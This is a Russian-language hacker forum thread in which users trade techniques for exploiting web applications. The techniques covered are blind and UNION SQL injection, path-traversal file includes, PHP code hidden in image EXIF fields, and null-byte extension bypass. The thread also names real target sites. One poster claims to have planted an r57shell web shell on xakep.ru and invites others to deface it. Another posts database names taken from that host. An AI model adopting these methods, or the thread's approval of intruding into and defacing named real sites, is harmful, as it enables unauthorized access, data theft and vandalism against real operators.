Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 След.
RSS
][akep attack
 
все дело в том,что порой мне намного проще найти уязвимость,чем суметь её грамотно использовать.
Например
1)sql-инъекции в скриптах asp (слепые).
ну тут надо читать,это понятно. Но всё равно,париться надо часами - согласитесь. ;)
2)php-инклюды с добавлением расширения и указанием текущей папки
(скажем /home/victim.com/www/pics/),исключающие возможность удаленного инклюда.Часто это получается
примерно так:
fopen(/home/victim.com/www/pics/../../../../../etc/passwd.html) - file not exists
аналогично:
fopen(/home/victim.com/www/pics/http://myshell.ru/path_to_shell/shell.html) --||--
(может быть не обязательно fopen,но думаю,суть ясна.
3) возможность загрузки файлов (движок на php) с строгой фильтрацией настоящего расширения,т.е конечного.
Как не переименовывай файл - php.2 php.txt php3 и тд. - скрипт разрешает только jpg,gif И swf. При таком раскладе php-код
никак не может выполнится.(или есть какой-то хитрый трюк,которого я не знаю)
4) иньекции mysql.
Часто бывают ошибки типа mysql_num_rows где используется SELECT * from news или похожее.Так вот тут никак не подобрать
кол-во полей. Допустим запрос union select * from users не даст нужного результата,не говоря уже о union select 1,2,3,..и т.д.
Вообщем,когда ломаешь один и тихо,натыкаешься на кучу подводных камней и без помощи тут никак не обойтись.
 
Я тебя не совсем понял. Ты аудиту веб приложений хочешь научится или просто уязвимости некоторых ресурсов хочешь продемонстрировать?
 
скорее первое. ;) однозначно первое.
 
А зачем тогда уязвимости др. ресурсов на показ выставлять? Это аналогично тому, что ты кинул в толпу чуток погнутый ключ от квартиры твоего друга... Если интересует аудит - создавай новую тему, выставляй на обсуждения вопросы отдельные.
 
Цитата
fowl пишет:
3) возможность загрузки файлов (движок на php) с строгой фильтрацией настоящего расширения,т.е конечного. Как не переименовывай файл - php.2 php.txt php3 и тд. - скрипт разрешает только jpg,gif И swf. При таком раскладе php-код никак не может выполнится.(или есть какой-то хитрый трюк,которого я не знаю
ну в некоторых случаях может помочь загрузка картинки (именно картинки) с <? system($cmd) ?> в поле поле копирайт... Естественно если картинка грузится напрямую такой трюк ничем не поможет, а вот если она инклюдится php-скриптом, это уже интерсно...
ЗЫ если знали, ногами прошу не бить...
 
Поле копирайт? Ты хотя бы пиши подробнее - мол заполнять нужно EXIF теги картинки.

Что касается заливки - я уже давно сказал о уязвимости в FCEditor. Причём в данном случае я на 100% уверен что дырка не прикрыта.

А вообще - предлагаю тему закрыть, ибо это вроде сек., а не хак форум.
 
S1B,насчет этой уязвимости - read PM. Скажу сразу,у меня пока ничего не получилось.Может сам попробуешь?  :idea:
Если всё пойдёт как надо,поставим дружественный деф на хакере и закроем тему
 
Ага. Ты бы ещё президента предложил убить на форумах кремлин.ру. Сам пробовать не буду - ну сломаем, толку-то? Тупая слава? Короче если надо инфу по уязве - ICQ #4124477. Тока когда стучать будешь - представься. В блек занесу. Шутка :)
 
короче шелл я залил. Имя - "r57shell.php." Вопрос только в том,в какую папку он залился.Кто найдёт - сайт дефейсанёт  ;)
ps. мне самому заколебало его искать.
 
ну и дурь на последок:
login.php на xyligan.ru (проверь на иньекцию)
:sensored:

Uninitialized string offset: 0 in /home/httpd/vhosts/ru/xylite/includes/dal/UserFactory.php on line 169
Undefined index: ERROR_PASSWORD_OR_NICKNAME in /home/httpd/vhosts/ru/xylite/login.php on line 30
 
fowl + 1 за тему, продолжай в том же духе, а админы если им интересно пусть читают этот форум  ;)


--- moderator hat on ---

Читаем, читаем, не беспокойся.
Тему, конечно, пора бы и прикрыть, но вроде как (после нескольких внушений, правда) прямых ссылок, куда ламер может тупо ткнуть и "сламать тырнет", нету -- так что ладно =)

--- moderator hat off ---
 
> Геннадьевич
я за открытость информации
 
ЛОЛ маразм крепчал ....
Цитата
--- moderator hat on ---
- что за чудеса и к чему?
Речь шла о том, что многие Админы приходят на сек лаб в поисках решения вопроса по устранению уязвимостей +
Тех  сайтов - которые прописаны в данном топике - при чем тут реплика?   :D  :D  :D
P/s Не надо так перерабатывать, а то скоро можно не бось есть, что на Свой счет записать
Удачи.


--- moderator hat on ---

Во-первых, комментировать действия администрации мало того что не принято, а даже запрещено правилами форума.
Во-вторых, я ясно дал понять, что публикация прямых ссылок на уязвимости также запрещена. Ибо бездна народа видя ссылку тупо на нее клацает. И тем самым, в зависимости от уязвимости, может просто за DDoS-ить сайт.
В-третьих, админы приходят на секлаб не только в поисках решения проблем. Некоторые просто просматривают в форумы в поисках подобной информации. Ибо, возможно, это поможет им "похокать" конкурента.

--- moderator hat off ---
 
вообщем я так понял. шелл загружен - никому не нужен. (аж стихами заговорил  ;) ) ][акер остается нетронутым. :o
 
>fowl
А что если в google вбить запрос типа: inurl:r57shell.php. ? :)
 
Не найдено ни одного документа, соответствующего запросу inurl:r57shell.php site:"xakep.ru"
гугл его не проиндексивал.естественно,на шелл ссылок то нет. а то было бы весело   ;)
 
Может кому интересны названия баз данных с упомянутого хоста

anime
catalogs
files
forum_dvdexpert
forum_gameland
forum_gamepost
forum_glc
forum_guides
forum_maxi-tuning
forum_mconline
forum_members
forum_mybiz
forum_onboardmagazine
forum_totaldvd
forum_totalfootball
forum_xakep
forum_xyligan
master
model
msdb
tempdb
test
totaldvd_old12042007
 
Блин, закройте тему, замотали уже.  :evil:
 
Вообще да: что-то не в то русло река потекла...


Единственное от себя добавлю:

Цитата
fowl пишет:
3) возможность загрузки файлов (движок на php) с строгой фильтрацией настоящего расширения,т.е конечного.Как не переименовывай файл - php.2 php.txt php3 и тд. - скрипт разрешает только jpg,gif И swf. При таком раскладе php-кодникак не может выполнится.(или есть какой-то хитрый трюк,которого я не знаю)4) иньекции mysql.
Что значит "строгая фильтрация"? Можно попытаться "отбросить" последнее расширение файла добавляя в конце строки символ окончания строки (для php вроде он как и для си: "/0" А может и "%00"). Т.е. это нам поможет инклудить файл, даже если скрипт сам автоматом дописывает расширения вроде .jpg и прочих.
Я сам уж и не вспомню как там дописывается к параметрам этот символ окончания что-то простое.... Так что наведи справки


Цитата
fowl пишет:
Допустим запрос union select * from users не даст нужного результата,не говоря уже о union select 1,2,3,..и т.д.
при подборе полей при инъекции нельзя указывать "*": надо подбирать кол-во полей
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
В поле start ввел  -1
http://www.friendsofken.co.uk/forum/viewtopic.php?t=4351&start=-1&postdays=0&postorder=asc&highlight=&sid=00dffecc96f39d6b5ee6f49c60303d11

и шо це таке , объясните?
Страницы: Пред. 1 2 3 След.
Читают тему